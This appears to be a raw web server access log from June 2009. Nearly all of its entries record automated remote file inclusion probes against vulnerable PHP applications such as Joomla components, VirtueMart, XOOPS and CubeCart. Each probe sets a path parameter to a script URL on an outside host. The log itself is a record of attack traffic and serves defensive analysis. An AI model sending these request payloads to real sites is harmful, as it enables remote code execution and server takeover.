89.107.224.140 - - [04/Jun/2009:07:35:03 -0500] "GET /logs/access_log.1240531200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:07:35:03 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:35:07 -0500] "GET /logs/access_log.1235260800//login.php?dir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:35:26 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:35:26 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:35:26 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:36:13 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:36:51 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:36:51 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:07:36:51 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.151.132.176 - - [04/Jun/2009:07:37:57 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:39:42 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 310 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:39:42 -0500] "GET /logs/access_log.1239926400//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 332 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:07:39:42 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 305 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:43:52 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:43:52 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:43:56 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:46:46 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:46:49 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:46:51 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:07:46:54 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:47:03 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:47:03 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:07:47:05 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:07:47:06 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:47:31 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:47:31 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:47:31 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:07:47:43 -0500] "GET //?_zb_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.106.67.146 - - [04/Jun/2009:07:47:52 -0500] "GET /logs//?_zb_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.250.85.200 - - [04/Jun/2009:07:48:24 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:48:24 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:48:24 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:51:25 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:51:31 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:51:31 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:52:13 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:52:13 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:52:13 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:55:28 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:07:55:34 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.244 - - [04/Jun/2009:07:57:09 -0500] "GET /logs/access_log.1176768000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.192 - - [04/Jun/2009:07:57:57 -0500] "GET /logs/access_log.1238112000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:57:57 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:57:57 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:57:57 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:58:10 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:58:10 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:58:18 -0500] "GET /logs/access_log.1238112000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:58:18 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:59:00 -0500] "GET /logs/access_log.1240272000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:59:00 -0500] "GET /logs/access_log.1241654400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:59:06 -0500] "GET /logs/access_log.1240272000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:59:06 -0500] "GET /logs/access_log.1239494400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:07:59:12 -0500] "GET /logs/access_log.1241654400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:06:24 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:06:24 -0500] "GET /logs/access_log.1239321600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:06:24 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:10:36 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:10:36 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 3233 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:10:38 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 191655 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:08:15:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:08:15:13 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:08:15:13 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:37 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:37 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:37 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:37 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:08:17:38 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:08:17:42 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:08:17:42 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:08:17:42 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:08:17:54 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:08:19:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:08:19:16 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:08:19:16 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:08:19:16 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:08:20:55 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:08:21:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:08:21:27 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:08:21:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:21:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:21:44 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:21:44 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:21:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:08:22:32 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:08:22:40 -0500] "GET /logs/access_log.1239926400//components/com_cpg/cpg.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:08:22:41 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:08:22:41 -0500] "GET /logs/access_log.1240358400//components/com_cpg/cpg.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:08:22:41 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:22:47 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:22:47 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:22:47 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:22:47 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:08:22:58 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:08:23:02 -0500] "GET /logs/access_log.1242000000//components/com_cpg/cpg.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:23:04 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:23:04 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:08:23:05 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:23:08 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 299 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:23:08 -0500] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 3233 "-""Mozilla/5.0"
125.206.170.126 - - [04/Jun/2009:08:23:10 -0500] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 200 191655 "-""Mozilla/5.0"
65.55.208.138 - - [04/Jun/2009:08:23:20 -0500] "GET /logs/access_log.1232150400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.135.14 - - [04/Jun/2009:08:23:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:08:23:23 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:08:23:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:08:23:27 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:08:24:42 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:08:25:20 -0500] "GET /littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
